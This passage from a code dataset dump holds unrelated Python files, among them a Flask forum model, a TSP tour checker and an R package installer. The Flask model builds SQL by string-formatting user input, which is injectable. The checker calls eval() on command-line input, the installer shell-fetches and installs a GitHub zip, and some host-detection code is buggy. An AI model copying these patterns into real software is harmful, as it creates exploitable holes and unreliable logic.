y = vector of coords for the y axis\n prof_start = (x, y) pair for the start of the profile line\n prof_end = (x, y) pair for the end of the profile line\n params = dictionary of parameters for the profiler (currently nbins and width)\n \n '''\n \n xx,yy = np.meshgrid(x,y)\n \n prof_start = np.array(prof_start)\n prof_end = np.array(prof_end)\n \n # Profile dimensions relative to profile itself\n prof_dist = np.sqrt((prof_start[1]-prof_end[1])**2 + (prof_start[0]-prof_end[0])**2)\n prof_bin_edges = np.linspace(0, prof_dist ,params[\"nbins\"]+1) \n prof_bin_mids = (prof_bin_edges[:-1] + prof_bin_edges[1:]) / 2\n \n # Profile points in lat long space\n bin_mids = np.linspace(0,1,params[\"nbins\"]+1)\n bin_grad = prof_end - prof_start\n x_mids = prof_start[0] + (bin_mids * bin_grad[0])\n y_mids = 
prof_start[1] + (bin_mids * bin_grad[1])\n \n # Gradient of line perpendicular to profile\n bin_grad_norm = (params[\"width\"]/2) * bin_grad / np.linalg.norm(bin_grad)\n \n # Corner points of bins\n bin_x1 = x_mids + bin_grad_norm[1]\n bin_x2 = x_mids - bin_grad_norm[1]\n bin_y1 = y_mids - bin_grad_norm[0]\n bin_y2 = y_mids + bin_grad_norm[0]\n \n # Pre-allocate outputs\n bin_val = np.zeros_like((bin_x1[:-1]))\n bin_std = np.zeros_like(bin_val)\n \n # Trim data set to points inside any bin (improves run time)\n full_poly = path.Path([(bin_x1[0], bin_y1[0]), (bin_x1[-1], bin_y1[-1]), (bin_x2[-1], bin_y2[-1]), (bin_x2[0], bin_y2[0])])\n poly_points = full_poly.contains_points(np.transpose([xx.flatten(),yy.flatten()]))\n poly_points = poly_points.reshape(data.shape)\n trim_data = data[poly_points]\n trim_xx = xx[poly_points]\n trim_yy = yy[poly_points]\n \n # Loop through each bin identifying the points that they contain\n for ii in range(0,params[\"nbins\"]):\n \n poly_x = np.array([bin_x1[ii], bin_x1[ii+1], bin_x2[ii+1], bin_x2[ii]]);\n poly_y = np.array([bin_y1[ii], bin_y1[ii+1], bin_y2[ii+1], bin_y2[ii]]);\n \n poly = path.Path([(poly_x[0], poly_y[0]), (poly_x[1], poly_y[1]), (poly_x[2], poly_y[2]), (poly_x[3], poly_y[3])])\n \n poly_points = poly.contains_points(np.transpose([trim_xx,trim_yy]))\n \n in_poly_vals = trim_data[poly_points]\n\n bin_val[ii] = np.nanmean(in_poly_vals)\n \n # get point cloud\n poly_x = np.array([bin_x1[0], bin_x1[-1], bin_x2[-1], bin_x2[0]])\n poly_y = np.array([bin_y1[0], bin_y1[-1], bin_y2[-1], bin_y2[0]])\n points_poly = np.vstack((poly_x,poly_y)).T\n points_poly = np.vstack((points_poly,np.array([points_poly[0,0],points_poly[0,1]])))\n \n poly = path.Path([(poly_x[0], poly_y[0]), (poly_x[1], poly_y[1]), (poly_x[2], poly_y[2]), (poly_x[3], poly_y[3])])\n poly_points = poly.contains_points(np.transpose([trim_xx,trim_yy]))\n points_val = trim_data[poly_points]\n points_x = trim_xx[poly_points]\n points_y = trim_yy[poly_points]\n \n 
prof_m = (prof_start[1] - prof_end[1]) / (prof_start[0] - prof_end[0])\n points_m = (prof_start[1] - points_y) / (prof_start[0] - points_x)\n points_prof_angle = np.arctan((points_m - prof_m) / (1 + prof_m * points_m))\n points2prof_start = np.sqrt((prof_start[1] - points_y)**2 + (prof_start[0] - points_x)**2)\n points_dist = points2prof_start * np.cos(points_prof_angle)\n \n return bin_val, prof_bin_mids, points_val, points_dist, points_poly","sub_path":"interseis_lib.py","file_name":"interseis_lib.py","file_ext":"py","file_size_in_byte":6580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"58721155","text":"import sys\nimport os\nimport re\nfrom pathlib import Path\n\n\ndef get_line_contains_idx(substr, lines):\n idx = -1\n for line in lines:\n if line.startswith(substr):\n idx = lines.index(line)\n \n return idx\n\n\ndef convert_wight_section(text, isSop):\n orderings = []\n lines = text.split(\"\\n\")\n idx = get_line_contains_idx(\"EDGE_WEIGHT_SECTION\", lines)\n if isSop:\n del lines[idx + 1]\n \n dims_idx = get_line_contains_idx(\"DIMENSION\", lines)\n sets_idx = get_line_contains_idx(\"GTSP_SETS\", lines)\n\n if idx == -1 or dims_idx == -1:\n return text, orderings\n\n dims = int(lines[dims_idx].split(\" : \")[1])\n for i in range(idx + 1, idx + dims + 1):\n strip_str = lines[i].strip()\n strip_str = re.sub('\\s+', ' ', strip_str)\n float_lst = list(map(float, strip_str.split(' ')))\n tmplst = []\n for vert_idx, fl in enumerate(float_lst):\n if fl == -1:\n tmplst.append(vert_idx + 1)\n \n orderings.append(tmplst)\n lines[i] = strip_str\n \n return \"\\n\".join(lines), orderings\n\n\ndef read_mat(text):\n lines = text.split(\"\\n\")\n idx = get_line_contains_idx(\"EDGE_WEIGHT_SECTION\", lines)\n dims_idx = get_line_contains_idx(\"DIMENSION\", lines)\\\n\n if idx == -1 or dims_idx == -1:\n return []\n \n dist_mat = []\n dims = int(lines[dims_idx].split(\" : \")[1])\n for i in range(idx + 1, idx + dims + 
1):\n strip_str = lines[i].strip()\n strip_str = re.sub('\\s+', ' ', strip_str)\n float_lst = list(map(float, strip_str.split(' ')))\n dist_arr = []\n for vert_idx, fl in enumerate(float_lst):\n dist_arr.append(round(fl))\n dist_mat.append(dist_arr)\n \n return dist_mat\n\n\ndef check_tour(filename, tour):\n if not filename.endswith(\".pcglns\"):\n print(\"Wrong file format\")\n return\n \n inst_file = open(filename, \"r\")\n text = inst_file.read()\n inst_file.close()\n dist_mat = read_mat(text)\n sum = 0\n for i in range(len(tour) - 1):\n # print(str(dist_mat[tour[i] - 1][tour[i + 1] - 1]) + \"\\n\")\n if (dist_mat[tour[i] - 1][tour[i + 1] - 1] == -1):\n print(\"Found -1 dist\")\n exit(0)\n \n sum += dist_mat[tour[i] - 1][tour[i + 1] - 1]\n\n if (dist_mat[tour[len(tour) - 1] - 1][tour[0] - 1] != -1):\n sum += dist_mat[tour[len(tour) - 1] - 1][tour[0] - 1]\n\n return sum\n\n\n\nif __name__ == \"__main__\":\n argc = len(sys.argv)\n print(str(argc))\n if argc != 3:\n print(\"Wrong arguments number\")\n exit(0)\n \n input_file = sys.argv[1]\n tour = eval(sys.argv[2])\n\n sum = check_tour(input_file, tour)\n print(\"Length:\", sum, \"tour:\", tour)","sub_path":"checkTour.py","file_name":"checkTour.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"428654","text":"#-*- coding: UTF-8 -*-\r\nfrom flask import g\r\n\r\nclass Topic:\r\n\r\n# GET\r\n\r\n # get a topic\r\n @staticmethod\r\n def get_topic(topic_id):\r\n query = '''SELECT topic.TopicID, topic.Title, topic.Content, topic.CommentNum, topic.Time, topic.ClickNum, node.Name AS NodeName, node.Abbr AS NodeAbbr, node.NodeID, user.Name AS UserName, user.Abbr AS UserAbbr, user.Avatar, user.UserID\\n\r\n FROM topic, user, node\\n\r\n WHERE topic.UserID = user.UserID\\n\r\n AND topic.NodeID = node.NodeID\\n\r\n AND topic.TopicID = %d''' % topic_id\r\n g.cursor.execute(query)\r\n return g.cursor.fetchone()\r\n\r\n # get 
topics\r\n @staticmethod\r\n def get_topics(num):\r\n query = '''SELECT topic.TopicID, topic.Title, topic.CommentNum, topic.Time, node.NodeID, node.Name AS NodeName, node.Abbr AS NodeAbbr, user.Name AS UserName, user.Abbr AS UserAbbr, user.Avatar\\n\r\n FROM topic, user, node\\n\r\n WHERE topic.UserID = user.UserID\\n\r\n AND topic.NodeID = node.NodeID\\n\r\n ORDER BY Time DESC LIMIT %d''' % num\r\n g.cursor.execute(query)\r\n return g.cursor.fetchall()\r\n\r\n # get topics by user\r\n @staticmethod\r\n def get_topics_by_user(user_id, page, num):\r\n query = '''SELECT topic.TopicID, topic.Title, topic.CommentNum, topic.Time, node.NodeID, node.Name AS NodeName, node.Abbr AS NodeAbbr, user.Name AS UserName, user.Abbr AS UserAbbr, user.Avatar\\n\r\n FROM topic, user, node\\n\r\n WHERE topic.UserID = user.UserID\\n\r\n AND topic.NodeID = node.NodeID\\n\r\n AND topic.UserID = %d\r\n ORDER BY Time DESC LIMIT %d, %d''' % (user_id, (page-1)*num, num)\r\n g.cursor.execute(query)\r\n return g.cursor.fetchall()\r\n\r\n # get topics num by user\r\n @staticmethod\r\n def get_topics_num_by_user(user_id):\r\n query = \"SELECT COUNT(*) AS TopicsNum FROM topic WHERE topic.UserID = %d\" % user_id\r\n g.cursor.execute(query)\r\n return g.cursor.fetchone()['TopicsNum']\r\n\r\n # get hot topics\r\n @staticmethod\r\n def get_hot_topics(num):\r\n query = '''SELECT topic.TopicID, topic.Title, user.Abbr AS UserAbbr, user.Avatar\\n\r\n FROM topic, user\\n\r\n WHERE topic.UserID = user.UserID\\n\r\n ORDER BY topic.CommentNum DESC LIMIT %d''' % num\r\n g.cursor.execute(query)\r\n return g.cursor.fetchall()\r\n\r\n # get topics by node\r\n @staticmethod\r\n def get_topics_by_node(node_abbr):\r\n query = '''SELECT topic.TopicID, topic.Title, topic.CommentNum, topic.Time, node.NodeID, node.Name AS NodeName, node.Abbr AS NodeAbbr, user.Name AS UserName, user.Abbr AS UserAbbr, user.Avatar\\n\r\n FROM topic, user, node\\n\r\n WHERE topic.UserID = user.UserID\\n\r\n AND topic.NodeID = 
node.NodeID\r\n AND node.Abbr = '%s'\\n\r\n ORDER BY Time DESC''' % node_abbr\r\n g.cursor.execute(query)\r\n return g.cursor.fetchall()\r\n\r\n# NEW\r\n\r\n # add topic\r\n @staticmethod\r\n def add(node_id, title, content, user_id):\r\n query = \"INSERT INTO topic (NodeID, Title, Content, UserID) VALUES (%d, '%s', '%s', %d)\" % (node_id, title, content, user_id)\r\n g.cursor.execute(query)\r\n g.conn.commit()\r\n return g.cursor.lastrowid\r\n\r\n# UPDATE\r\n\r\n # edit topic\r\n @staticmethod\r\n def edit(topic_id, node_id, title, content):\r\n query = \"UPDATE topic SET NodeID = %d, Title = '%s', Content = '%s' WHERE TopicID = %d\" % (node_id, title, content, topic_id)\r\n g.cursor.execute(query)\r\n return g.conn.commit()\r\n\r\n # add click num\r\n @staticmethod\r\n def add_click_num(topic_id):\r\n query = \"UPDATE topic SET ClickNum = ClickNum + 1 WHERE TopicID = %d\" % topic_id\r\n g.cursor.execute(query)\r\n return g.conn.commit()\r\n\r\n # add comment num\r\n @staticmethod\r\n def add_comment_num(topic_id):\r\n query = \"UPDATE topic SET CommentNum = CommentNum + 1 WHERE TopicID = %d\" % topic_id\r\n g.cursor.execute(query)\r\n return g.conn.commit()","sub_path":"xichuangzhu/models/topic_model.py","file_name":"topic_model.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"365877740","text":"from State import *\nfrom Utils import *\nimport time\n\n\ndef aStar(state: State, N: int):\n root = Node(state)\n stack = [root]\n tree = Tree(root)\n\n root.heuristics = h1(state.board) + h2(state.board)\n\n visited = []\n\n depth = 1\n\n while depth != 1000 and len(stack) != 0:\n print(\"visited:\", len(visited))\n stack.sort(key=lambda x: x.heuristics)\n\n s = stack.pop(0)\n depth = s.depth\n\n if flatten(s.info.board) not in visited:\n expanded = expand(s.info, N)\n # for each descendant we add the node to the tree and the new stack\n # we also create an edge between 
the parent and the newly created node\n for x in expanded:\n new_node = Node(x)\n new_node.heuristics = s.heuristics + h1(x.board) + h2(x.board)\n stack.append(new_node)\n tree.add_node(new_node)\n s.add_edge(new_node, 1)\n # as we already expanded 's' we need to add it's final state to the visited list\n visited.append(flatten(s.info.board))\n \n solution = contains_goal(stack, N)\n if solution is not None:\n print(\"Found Solution, Depth\", depth)\n return solution, tree\n \n # just to return if max depth is reached, as we dont want to keep an infinite loop,\n # the solution may be on depth 10000, as this is BFS we have no way to guarantee a\n # solution is found, so we keep a maximum depth expansion\n return None, tree\n\nif __name__ == \"__main__\":\n print(\"---- A* -----\")\n\n # print(\"8-PUZZLE\")\n # board = [\n # [1, 2, 3],\n # [5, 0, 6],\n # [4, 7, 8]\n # ]\n # initial = State(board, (1, 1), \"Start\")\n # print(initial)\n\n # t = time.time_ns()\n # node, tree = aStar(initial, 8)\n # if node is not None:\n # path = find_path(node)\n # print(\"- Solution -\")\n # print_path(path)\n # else:\n # print(\"- No Solution -\")\n # elapsed_time = time.time_ns() - t\n # print(\"Elapsed Time:\", elapsed_time / 1000.0, \"ms\")\n\n print(\"8-PUZZLE\")\n board = [\n [1, 3, 6],\n [5, 2, 0],\n [4, 7, 8]\n ]\n initial = State(board, (2, 1), \"Start\")\n print(initial)\n\n t = time.time_ns()\n node, tree = aStar(initial, 8)\n if node is not None:\n path = find_path(node)\n print(\"- Solution -\")\n print_path(path)\n else:\n print(\"- No Solution -\")\n elapsed_time = time.time_ns() - t\n print(\"Elapsed Time:\", elapsed_time / 1000.0, \"ms\")\n\n # print(\"8-PUZZLE\")\n # board = [\n # [1, 6, 2],\n # [5, 7, 3],\n # [0, 4, 8]\n # ]\n # initial = State(board, (0, 2), \"Start\")\n # print(initial)\n\n # t = time.time_ns()\n # node, tree = aStar(initial, 8)\n # if node is not None:\n # path = find_path(node)\n # print(\"- Solution -\")\n # print_path(path)\n # else:\n # 
print(\"- No Solution -\")\n # elapsed_time = time.time_ns() - t\n # print(\"Elapsed Time:\", elapsed_time / 1000.0, \"ms\")\n\n # print(\"8-PUZZLE\")\n # board = [\n # [8, 4, 6],\n # [5, 0, 7],\n # [2, 3, 1]\n # ]\n\n # initial = State(board, (1, 1), \"Start\")\n # print(initial)\n\n # t = time.time_ns()\n # node, tree = aStar(initial, 8)\n # if node is not None:\n # path = find_path(node)\n # print(\"- Solution -\")\n # print_path(path)\n # else:\n # print(\"- No Solution -\")\n # elapsed_time = time.time_ns() - t\n # print(\"Elapsed Time:\", elapsed_time / 1000.0, \"ms\")\n\n # print(\"16-PUZZLE\")\n # board = [\n # [5, 1, 3, 4],\n # [2, 0, 7, 8],\n # [10, 6, 11, 12],\n # [9, 13, 14, 15]\n # ]\n # initial = State(board, (1, 1), \"Start\")\n # print(initial)\n\n # t = time.time_ns()\n # node, tree = aStar(initial, 15)\n # if node is not None:\n # path = find_path(node)\n # print(\"- Solution -\")\n # print_path(path)\n # else:\n # print(\"- No Solution -\")\n # elapsed_time = time.time_ns() - t\n # print(\"Elapsed Time:\", elapsed_time / 1000.0, \"ms\")","sub_path":"Praticas/TP2/ex2c_aStar.py","file_name":"ex2c_aStar.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"560829405","text":"# Copyright 2010-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://aws.amazon.com/apache2.0\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. 
See the License for the specific language governing\n# permissions and limitations under the License.\n\nimport os\nimport sys\n\n\ndef current_platform():\n if sys.platform == 'win32':\n return 'windows'\n elif sys.platform == 'darwin':\n return 'macos'\n elif 'linux' in sys.platform or sys.platform in ('cygwin', 'msys'):\n return 'linux'\n\n\ndef current_arch():\n if current_platform() == 'linux':\n if os.uname()[4][:3].startswith('arm'):\n arch = ('armv8' if sys.maxsize > 2**32 else 'armv7')\n return ('x64' if sys.maxsize > 2**32 else 'x86')\n\n\ndef _file_contains(path, search):\n if os.path.isfile(path):\n #print('Probing {}'.format(path))\n with open(path) as f:\n line = f.readline()\n while line:\n #print(' {}'.format(line), end='')\n if search in line:\n return True\n line = f.readline()\n return False\n\n\n# cache the result of this, since it involves a bunch of file I/O\n_current_host = None\n\n\ndef current_host():\n try:\n return _current_host\n except:\n def _discover_host():\n platform = current_platform()\n if platform == 'linux':\n if _file_contains('/etc/system-release', 'Amazon Linux release 2'):\n return 'al2'\n if _file_contains('/etc/system-release', 'Bare Metal'):\n return 'al2012'\n if _file_contains('/etc/redhat-release', 'CentOS release 5.11 (Final)'):\n return 'manylinux'\n if _file_contains('/etc/redhat-release', 'CentOS Linux release 7.7.1908'):\n return 'manylinux'\n if _file_contains('/etc/lsb-release', 'Ubuntu'):\n return 'ubuntu'\n return 'linux'\n else:\n return platform\n _current_host = _discover_host()\n return _current_host\n","sub_path":"builder/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"352092739","text":"import logging\nimport os\ntry:\n from pylib.config import config, parse_args \nexcept ModuleNotFoundError:\n from config import config, parse_args\nimport pylib.gwreducer.constants as c\nfrom 
pylib.gwreducer.parse_input_file import parse_input_file\nfrom pylib.gwreducer.read_gw import GWData\nfrom pylib.gwreducer.reduce_dataset import reduce_dataset\nfrom pylib.gwreducer.summary_file import reset_summary_file \nimport pylib.gwreducer.reduce_groundwater_timeseries as rgt\n\ndef configure_logger(args):\n \"\"\"\n set the logger for this utility\n \"\"\"\n logging.basicConfig(\n level=c.LOG_LEVEL_MAP[args.loglevel],\n filemode=args.logfilemode.lower(),\n filename=args.logfile,\n **config[c.LOGGER_KEY]\n )\n\ndef get_inputfile(args):\n \"\"\"get input file or fail \"\"\"\n if os.path.exists(args.inputFile):\n return args.inputFile\n raise IOError(\"Could not locate input file '{}'.\".format(args.inputFile))\n\ndef get_output_folder(args):\n \"\"\" get output directory or fail\"\"\"\n if os.path.exists(args.outputFolder):\n return args.outputFolder\n raise IOError(\"Could not locate output folder '{}'.\".format(args.outputFolder))\n\n\n\ndef reduce_for_row_col(gw_data, row, col,\n summary_file, output_folder):\n \"\"\"\n extract a TimeSeries instance from a GWData\n corresponding to the target row/col and then reduce it\n \n returns True if succeded in reducing; false otherwise\n \n \"\"\"\n timeseries = gw_data.extract(row, col)\n worked = reduce_dataset(\n timeseries, summary_file, output_folder\n )\n return worked\n\n\ndef reduce_input_data(input_data, summary_file, output_folder):\n \"\"\"\n Reduce all the data in the input_data object for the\n given filekey\n\n \"\"\"\n filekey = input_data[\"Source File\"]\n logging.info(\"START reducing {}\".format(filekey))\n gw_data = GWData(filekey)\n\n for rowcol in gw_data.get_rowcols:\n row, col = rowcol.split('-')\n try:\n timeseries = gw_data.extract(row, col)\n \n #rt, rv = rgt.reduce_dataset(times, values)\n\n worked = reduce_for_row_col(\n gw_data, row, col,\n summary_file, output_folder)\n except TypeError as e:\n raise Exception(e)\n logging.error(\"failed at {} {}\".format(row, col))\ndef main():\n 
\"\"\" \n parse the input arguments, configure the logger\n obtain the input data\n reduce the input data\n and write the results\n\n \"\"\"\n\n args = parse_args()\n configure_logger(args)\n logging.info(\"START execution\")\n input_file = get_inputfile(args)\n input_data = parse_input_file(input_file)\n output_folder = get_output_folder(args)\n summary_filename = \"summary.csv\"\n summary_file = reset_summary_file(output_folder, summary_filename)\n reduce_input_data(input_data, summary_file,\n output_folder)\n\n logging.info(\"END execution\")\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"pylib/hssmbuilder/gwreducer/unused_code/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"227832347","text":"from rpy2.robjects.packages import importr\nimport rpy2.robjects as robjects\nimport click\nimport os, subprocess\n\n\nCONTEXT_SETTINGS = dict(help_option_names=['-h','--help'], max_content_width=90)\n\n@click.group(context_settings= CONTEXT_SETTINGS)\n@click.version_option(version='0.1')\ndef install():\n pass\n\nclass PackageInstaller:\n def __init__(self):\n self.lib_xml_location=os.popen('type xml2-config').read().split()[-1]\n self.lib_xml_location=robjects.r('function (xml.config) {Sys.setenv(XML_CONFIG=xml.config)}')(self.lib_xml_location)\n\n def install_bioconductor(self):\n base = importr('base')\n base.source(\"http://www.bioconductor.org/biocLite.R\")\n\n def install_tcga_biolinks(self):\n biocinstaller = importr(\"BiocInstaller\")\n biocinstaller.biocLite(\"TCGAbiolinks\")\n\n def install_minfi_others(self):\n biocinstaller = importr(\"BiocInstaller\")\n biocinstaller.biocLite(robjects.vectors.StrVector([\"minfi\",\"ENmix\",\n \"minfiData\",\"sva\",\"GEOquery\",\"geneplotter\"]))\n\n def install_custom(self, custom, manager):\n if not manager:\n biocinstaller = importr(\"BiocInstaller\")\n 
biocinstaller.biocLite(robjects.vectors.StrVector(custom),suppressUpdates=True)\n else:\n biocinstaller = importr(\"BiocManager\")\n for c in custom:\n if '=' in c:\n pkg,version= tuple(c.split('='))\n biocinstaller.install(pkg,ask=False,version=version)\n else:\n biocinstaller.install(c,ask=False)\n\n def install_devtools(self):\n subprocess.call('conda install -y -c r r-cairo=1.5_9 r-devtools=1.13.6',shell=True)\n robjects.r('install.packages')('devtools')\n\n def install_r_packages(self, custom):\n robjects.r[\"options\"](repos=robjects.r('structure(c(CRAN=\"http://cran.wustl.edu/\"))'))\n robjects.r('install.packages')(robjects.vectors.StrVector(custom))\n\n def install_meffil(self, git=False):\n if git:\n remotes=importr('remotes')\n remotes.install_github('perishky/meffil')\n else:\n subprocess.call(\"wget https://github.com/perishky/meffil/archive/master.zip && unzip master.zip && mv meffil-master meffil && R CMD INSTALL meffil\",shell=True)\n\n@install.command()\ndef change_gcc_path():\n \"\"\"Change GCC and G++ paths if don't have version 7.2.0. 
[Experimental]\"\"\"\n bin_path = os.path.join(os.popen('conda list | grep \"packages in environment at\" | awk \"{print $6}\"').read().split()[-1].replace(':',''),'bin')\n subprocess.call('export CC={}'.format(os.path.join(bin_path,'x86_64-conda_cos6-linux-gnu-gcc')),shell=True)\n subprocess.call('export CXX={}'.format(os.path.join(bin_path,'x86_64-conda_cos6-linux-gnu-g++')),shell=True)\n\n## Install ##\n@install.command()\ndef install_bioconductor():\n \"\"\"Installs bioconductor.\"\"\"\n installer = PackageInstaller()\n installer.install_bioconductor()\n\n@install.command()\n@click.option('-p', '--package', multiple=True, default=['ENmix'], help='Custom packages.', type=click.Path(exists=False), show_default=True)\n@click.option('-m', '--manager', is_flag=True, help='Use BiocManager (recommended).')\ndef install_custom(package,manager):\n \"\"\"Installs bioconductor packages.\"\"\"\n installer = PackageInstaller()\n installer.install_custom(package,manager)\n\n@install.command()\n@click.option('-p', '--package', multiple=True, default=[''], help='Custom packages.', type=click.Path(exists=False), show_default=True)\ndef install_r_packages(package):\n \"\"\"Installs r packages.\"\"\"\n installer = PackageInstaller()\n installer.install_r_packages(package)\n\n@install.command()\ndef install_minfi_others():\n \"\"\"Installs minfi and other dependencies.\"\"\"\n installer = PackageInstaller()\n installer.install_minfi_others()\n\n@install.command()\ndef install_tcga_biolinks():\n \"\"\"Installs tcga biolinks.\"\"\"\n installer = PackageInstaller()\n installer.install_tcga_biolinks()\n\n@install.command()\ndef install_meffil():\n \"\"\"Installs meffil (update!).\"\"\"\n installer = PackageInstaller()\n installer.install_meffil()\n\n@install.command()\ndef install_some_deps():\n \"\"\"Installs bioconductor, minfi, enmix, tcga biolinks, and meffil.\"\"\"\n installer = PackageInstaller()\n installer.install_bioconductor()\n installer.install_minfi_others()\n 
installer.install_tcga_biolinks()\n installer.install_meffil()\n\n# install.packages(\"png\", \"/home/user/anaconda3/lib/R/library\")\n\n\n\nif __name__ == '__main__':\n install()\n","sub_path":"build/lib/pymethylprocess/installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"67945996","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n DWF Python Example\n\n Modified by: MURAMATSU Atsushi \n Revised: 2016-04-21\n Original Author: Digilent, Inc.\n Original Revision: 8/21/2014\n\n Requires: \n Python 2.7, 3.3 or later\n\"\"\"\n\n#System librarys\nimport sys\nimport os\n#from matplotlib.pyplot import *\n#import numpy as np\nfrom time import sleep\n#from scipy import stats\nimport csv\n#Own librarys\nfrom waveform import *\nfrom vcd2 import *\nfrom verilog import *\nfrom xml import*\n\n\npath = \"C:/Users/Labor/Desktop\"\npath = \"C:/Users/Jocker/Desktop/desktop_150118/DigitalIO_EdwardNLB_v2.0\"\nfile = \"test9.xml\"\n\nxml.init(path=path,file=file)\n\nfreq = 10e6\n\nserial_len = 0\n\n# Setup Supply Voltage VDD25 for DD.DIO / Edward\ndd.configAIO(2.5)\n# Set Digital Discovery DO Channels for JTAG and SPI\ndd.setDIO(\n freq = freq,\n dio1_pins = DIO1_PINS(TCK=0, TMS =1, TDI=2, TRIGGER =3, # JTAG\n DIN=5, SYNC1=7, SCLK=4, SYNC0=6 ) # SPI\n ) \n \n\n#sleep(1)\n\n###############################################################################\n#### Setup AD2/ Supply Voltage and Multiplexer DI\n###############################################################################\n\n#analysis.config_discovery(freq = freq)\n\nSegmentVolt1 = [0.0]\nSegmentVolt2 = [0.0]\nSegmentVolt3 = [0.0]\nSegmentVolt4 = [0.0]\nSegmentVolt5 = [0.0]\nSegmentVolt6 = [0.0]\nSegmentTime = []\nSegmentMeas = []\nSegmentID = []\nSegmentTrigger = []\nSequences = []\nSequenceCycles = 
[]\n\n###############################################################################\n#### Set Edward Voltages and SA Current\n###############################################################################\n\nserial.waveformReset()\n\nedward.reset(freq = freq)\nedward.idcode()\nserial.trig()\n\nedward.addr_jtag(MACRO = 0, SECTOR = 0b00, WL = 0, BL = 0)\nedward.irefsel_jtag(0b01)\nedward.timingsrc_jtag(0b01) \nedward.detrap(0b00)\n\n#edward.srcsel(0b0)\nedward.atd_en(0b0)\nedward.set_vbl_idle(0b0)\nedward.set_vread(0b10)\n\nedward.set_vwl_idle(0b0)\n\n\nedward.maskref_wr(0x0000)\nedward.maskref_rd(0x0000)\n\nedward.t_eq(360e-9)\nedward.t_read(360e-9)\nedward.t_be(10E-6)\nedward.t_write(10e-6)\nedward.t_inhib(300e-9)\nedward.t_detrap(320E-9)\nedward.n_wakeup(1)\n\n#enable binning\nbinning = 0x0\nedward.bin_neighbor(0b0)\nedward.binning(binning)\n\n#edward.cmd_jtag(C_BE)\n#edward.cmd_jtag(C_BP)\n\nedward.dma(0b1)\n\nSegmentVolt1 += [0.0]\nSegmentVolt2 += [0.0]\nSegmentVolt3 += [0.0]\nSegmentVolt4 += [0.0]\nSegmentVolt5 += [0.0]\nSegmentVolt6 += [0.0]\nSegmentTime += [(len(serial.tms)-serial_len)/freq]\nSegmentMeas += [0]\nSegmentID += [1]\nSegmentTrigger += [0]\n\nSequences += [1]\nSequenceCycles += [1]\n\nserial_len = len(serial.tms)\n\n###############################################################################\n#### DMA Mode\n###############################################################################\n\nedward.addr_jtag(MACRO = 0, SECTOR = 0b00, WL = 0, BL = 1)\nedward.datain_jtag(0x1)\n\nSegmentVolt1 += [0.0]\nSegmentVolt2 += [0.0]\nSegmentVolt3 += [0.0]\nSegmentVolt4 += [0.0]\nSegmentVolt5 += [0.0]\nSegmentVolt6 += [0.0]\nSegmentTime += [(len(serial.tms)-serial_len)/freq]\nSegmentMeas += [0]\nSegmentID += [2]\nSegmentTrigger += [0]\n\nramp_time = 1/freq\nhold_time = 10e-6\nserial.clockCycle((2*ramp_time+hold_time)*freq)\n\nSegmentVolt1 += [4.5,4.5,0.0] #VWL_ACT\nSegmentVolt2 += [0.0,0.0,0.0] #VBL_ACT\nSegmentVolt3 += [0.0,0.0,0.0] #VSL_ACT\nSegmentVolt4 
+= [1.5,1.5,0.0] #VWL_PAS\nSegmentVolt5 += [3.0,3.0,0.0] #VBLSL_PAS\nSegmentVolt6 += [0.0,0.0,0.0] #VBULK\nSegmentTime += [ramp_time,hold_time,ramp_time ]\nSegmentMeas += [10,50,10]\nSegmentID += [2,2,2]\nSegmentTrigger += [0,0,0]\n\nserial_len = len(serial.tms)\n\ncycles = 16\n\nSequences += [2]\nSequenceCycles += [cycles*2]\n\nfor wl in range(2):\n for i in range(1,cycles*2,2):\n edward.datain_jtag(i)\n edward.addr_jtag(MACRO = 0, SECTOR = 0b00, WL = wl, BL = 1)\n serial.clockCycle((2*ramp_time+hold_time)*freq)\n\n\n#figure(\"Dummy Measurements\")\n#step(arange(len(serial.tms))/freq/1E-6, np.array(serial.tms)-1.2)\n#step(arange(len(serial.tms))/freq/1E-6, np.array(serial.tdi)-2.4)\n\nxml.SeqArb3PU(plot_waveform = False,\n SegmentVolt1 = SegmentVolt1,\n SegmentVolt2 = SegmentVolt2,\n SegmentVolt3 = SegmentVolt3,\n SegmentVolt4 = SegmentVolt4,\n SegmentVolt5 = SegmentVolt5,\n SegmentVolt6 = SegmentVolt6,\n SegmentTime = SegmentTime,\n SegmentMeas = SegmentMeas,\n SegmentID = SegmentID,\n SegmentTrigger = SegmentTrigger,\n Sequences = Sequences,\n SequenceCycles = SequenceCycles)\n\ndd.configDIO()\n\nstep(arange(len(dd.rgwSamples)),dd.rgwSamples)\n\ndd.close()","sub_path":"_testbench_prg.py","file_name":"_testbench_prg.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"273983655","text":"import pygame\nfrom pygame import draw, display, rect\nfrom pygame.locals import SWSURFACE, FULLSCREEN, HWSURFACE, DOUBLEBUF\ndef build(settings): \n\tpygame.init()\n\tfullscreen = True\n\t \n\tif fullscreen:\n\t\tdepth = 0\n\t\tflags = FULLSCREEN | HWSURFACE | DOUBLEBUF\n\telse:\n\t\tdepth = 16\n\t\tflags = SWSURFACE | DOUBLEBUF\n\t \n\tmodes = display.list_modes(depth, 